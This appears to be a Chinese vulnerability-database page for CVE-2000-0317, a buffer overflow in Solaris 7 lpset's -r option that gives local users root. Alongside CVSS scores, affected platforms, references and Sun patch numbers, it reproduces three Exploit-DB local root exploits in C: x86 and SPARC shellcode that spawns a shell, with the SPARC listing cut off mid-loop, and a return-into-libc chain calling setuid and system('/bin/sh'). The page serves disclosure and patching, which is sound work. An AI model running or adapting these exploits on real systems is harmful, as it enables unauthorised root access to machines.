CVE-2000-0317
CVSS7.2
发布时间 :2000-04-24 00:00:00
修订时间 :2016-10-17 22:06:47
NMCOES    

[原文]Buffer overflow in Solaris 7 lpset allows local users to gain root privileges via a long -r option.


[CNNVD]Solaris lpset -r缓冲区溢出漏洞(CNNVD-200004-068)

        Solaris 7 lpset 存在缓冲区溢出漏洞,本地用户可以通过超长-r选项获得根用户权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0317
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0317
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-068
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-04/0192.html
(VENDOR_ADVISORY)  BUGTRAQ  20000424 Solaris 7 x86 lpset exploit.
http://archives.neohapsis.com/archives/bugtraq/2000-04/0236.html
(VENDOR_ADVISORY)  BUGTRAQ  20000424 Solaris 7 x86 lpset exploit.
http://marc.info/?l=bugtraq&m=95729763119559&w=2
(UNKNOWN)  BUGTRAQ  20000427 Re: Solaris/SPARC 2.7 lpset exploit (well not likely !)
http://www.securityfocus.com/bid/1138
(VENDOR_ADVISORY)  BID  1138

- 漏洞信息

Solaris lpset -r缓冲区溢出漏洞
高危 缓冲区溢出
2000-04-24 00:00:00 2005-10-20 00:00:00
本地  
        Solaris 7 lpset 存在缓冲区溢出漏洞,本地用户可以通过超长-r选项获得根用户权限。

- 公告与补丁

        Sun has made the following patches available from
        http://sunsolve.sun.com/securitypatch:
        SunOS 5.8 109320-01
         SunOS 5.8_x86 109321-01
         SunOS 5.7 107115-05
         SunOS 5.7_x86 107115-05
         SunOS 5.6 106235-06
         SunOS 5.6_x86 106236-06
        Checksums are available at: ftp://sunsolve.sun.com/pub/patches/CHECKSUMS
        Removal of the setuid bit on the lpset executable will remove this problem. As this program is intended to only be runable by root, and members of the 'sysadmin' group (group14), removal of this bit should not have a significant impact.

- 漏洞信息 (19872)

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (1) (EDBID:19872)
solaris local
2000-04-24 Verified
0 DiGiT
N/A [点击下载]
source: http://www.securityfocus.com/bid/1138/info

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

/*=20 
 *
 * solaris 2.7 lpset local exploit, i386.
 * discovered by: duke 
 * not the same as on bt.
 * if exploit dosen=B4t work try offset from 300-450
 *
 * greets: duke, #!ADM, #!security.is, #hax
 *
 * DiGiT - teddi@linux.is
 *  
*/

    
#include <unistd.h>
#include <stdio.h> 
#include <stdlib.h>
#include <string.h> 

char shellcode[] =3D
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
 
long get_esp() { __asm__("movl %esp,%eax"); }
 
int main (int argc, char *argv[]) {
 
    long offset=3D410;
    int nop=3D64;
    int gab=3D40;
    long addr;
    char buffer[210];
    int i, a, b;   

if (argc > 1) offset =3D strtol(argv[1], NULL, 0);
if (argc > 2) gab =3D strtol(argv[2], NULL, 0);
if (argc > 3) nop =3D strtol(argv[2], NULL, 0);
 
   for (a =3D 0; a <gab; a++)
        buffer[a] =3D 'A';
 
  addr =3D get_esp() + offset;
 
  buffer[a++] =3D addr & 0x000000ff;
  buffer[a++] =3D (addr & 0x0000ff00) >> 8;  
  buffer[a++] =3D (addr & 0x00ff0000) >> 16;
  buffer[a++] =3D (addr & 0xff000000) >> 24;
 
  for ( ; a < nop; a++)
    buffer[a] =3D 0x90;
    
  for (b =3D 0; b < strlen(shellcode); b++, a++)
    buffer[a] =3D shellcode[b];
    
  buffer[strlen(buffer)] =3D '\0';

        printf("addr =3D 0x%x\n", addr);
        execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL);
   
}       		

- 漏洞信息 (19873)

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (2) (EDBID:19873)
solaris local
2000-04-24 Verified
0 Theodor Ragnar Gislason
N/A [点击下载]
source: http://www.securityfocus.com/bid/1138/info
 
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

#include <unistd.h>
#include <stdio.h> 

#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200 

#define NOP 0xac15a16e

#define EXSTART 116

char sparc_shellcode[] =

/* setreuid(0,0) */
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"

/* other stuff */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

u_long get_sp() { asm("mov %sp, %i0"); }

main(int argc, char *argv[]) {
        int i,ofs=OFFSET,start=START,end=END;
        u_long ret, *ulp;
        char *buf;

        if (argc > 1) ofs=atoi(argv[1])+8;

        if (!(buf = (char *) malloc(BSIZE+2))) {
                fprintf(stderr, "out of memory\n");
                exit(1);
        }

        ret = get_sp() - ofs;

        for (ulp = (u_long *)buf,i=0; ulp < (u_long *)&buf[BSIZE]; i+=4,ulp++)
                *ulp = NOP;

        for (i = start, ulp=(u_long *)&buf[start]; i < end; i+=4) *ulp++ = ret;

        for (		

- 漏洞信息 (19874)

Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (3) (EDBID:19874)
solaris local
2000-04-24 Verified
0 Theodor Ragnar Gislason
N/A [点击下载]
source: http://www.securityfocus.com/bid/1138/info
  
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36     

#define SYSTEM (BASE + 0x5b328)
#define SCANF  (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD  (BASE + 0x83754)
#define BINSH  (BASE + 0x83654)
#define POP3   (SYSTEM + 610)  
#define POP2   (SYSTEM + 611)  
#define POP1   (SYSTEM + 612)  

int
main()
{     
    unsigned char expbuf[1024];
    char *env[1]; 
    int *p, i;    
    
    memset(expbuf, 'a', BUFSIZE);
    p = (int *)(expbuf + BUFSIZE);
    
    *p++ = STACK;
    *p++ = SCANF + 1;
    *p++ = STACK + 6 * 4;
    *p++ = POP2; 
    *p++ = PERCD;
    *p++ = STACK + 9 * 4;
    
    *p++ = STACK + 10 * 4;
    *p++ = SETUID; 
    *p++ = POP1;   
    *p++ = 0x33333333;
    *p++ = STACK + 15 * 4;
    
    *p++ = SYSTEM;
    *p++ = 0x33333333;
    *p++ = BINSH;     
    *p = 0;
    
    env[0] = 0;
    execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
           env);       
    return 0;
}		

- 漏洞信息

7157
Solaris 7 lpset -r Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-04-24 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Solaris lpset -r Buffer Overflow Vulnerability
Boundary Condition Error 1138
No Yes
2000-04-24 12:00:00 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list on April 24, 2000 by Theodor Ragnar Gislason <teddi@linux.is>

- 受影响的程序版本

Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6

- 漏洞讨论

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.

- 漏洞利用

exploit available

- 解决方案

Sun has made the following patches available from http://sunsolve.sun.com/securitypatch:

SunOS 5.8 109320-01
SunOS 5.8_x86 109321-01
SunOS 5.7 107115-05
SunOS 5.7_x86 107115-05
SunOS 5.6 106235-06
SunOS 5.6_x86 106236-06

Checksums are available at: ftp://sunsolve.sun.com/pub/patches/CHECKSUMS

Removal of the setuid bit on the lpset executable will remove this problem. As this program is intended to only be runable by root, and members of the 'sysadmin' group (group14), removal of this bit should not have a significant impact.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站